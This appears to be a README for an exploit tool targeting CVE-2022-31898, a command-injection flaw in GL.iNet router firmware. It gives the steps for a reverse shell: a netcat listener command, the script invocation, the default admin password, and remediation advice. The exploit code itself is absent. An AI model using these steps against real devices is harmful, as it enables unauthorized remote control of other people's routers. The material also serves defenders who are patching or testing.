Share
## https://sploitus.com/exploit?id=63A2EA58-3B55-5F4A-815C-DDFA5F92EF04
# ๐Ÿฅญ MangoPunch: CVE-2022-31898
### Authenticated OS Command Injection for GL.iNet Devices

![Python](https://img.shields.io/badge/Python-3.x-blue?style=for-the-badge&logo=python)
![CVE](https://img.shields.io/badge/CVE-2022--31898-red?style=for-the-badge)
![Security](https://img.shields.io/badge/Security-Research-green?style=for-the-badge)

```text
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    
```

---

## ๐Ÿ” Vulnerability Overview

This repository contains a technical Proof of Concept (PoC) for a **Remote Command Execution (RCE)** vulnerability found in the GL.iNet MT300N-V2 (Mango) and other models running firmware versions below **3.215**.

The flaw exists in the `ping_addr` parameter of the diagnostic API, allowing an authenticated attacker to execute arbitrary system commands via shell metacharacters (`;`).

---

## ๐Ÿš€ Execution Guide

### 1. Prepare your Listener
Open a terminal in your attacker machine (Kali Linux) and start a Netcat listener:

```bash
nc -lvnp 9292
```

### 2. Run the Exploit
Use the following command to trigger the reverse shell:

```bash
python3 mangopunch.py -R  -L  -l  -p 
```

---

## ๐Ÿ› ๏ธ Script Parameters

| Flag | Full Name | Description | Default |
| :--- | :--- | :--- | :--- |
| `-R` | `--rhost` | Remote Target IP (Router) | `Required` |
| `-P` | `--rport` | Web Management Port | `443` |
| `-L` | `--lhost` | Listener IP (Kali/Attacker) | `Required` |
| `-l` | `--lport` | Listener Port | `Required` |
| `-p` | `--pwd` | Admin Password | `goodlife` |
| `-t` | `--https` | Enable HTTPS | `False` |

---

## ๐Ÿ›ก๏ธ Remediation

* **Update Firmware**: Ensure your device is running version **3.215** or higher.
* **Input Validation**: Developers should implement strict Regex validation for IP/Hostname parameters and avoid shell-invoking functions that pass raw strings to the OS.

---

> **Disclaimer**: This tool is for educational and authorized security testing purposes only. The author is not responsible for any misuse. MangoPunch: CVE-2022-31898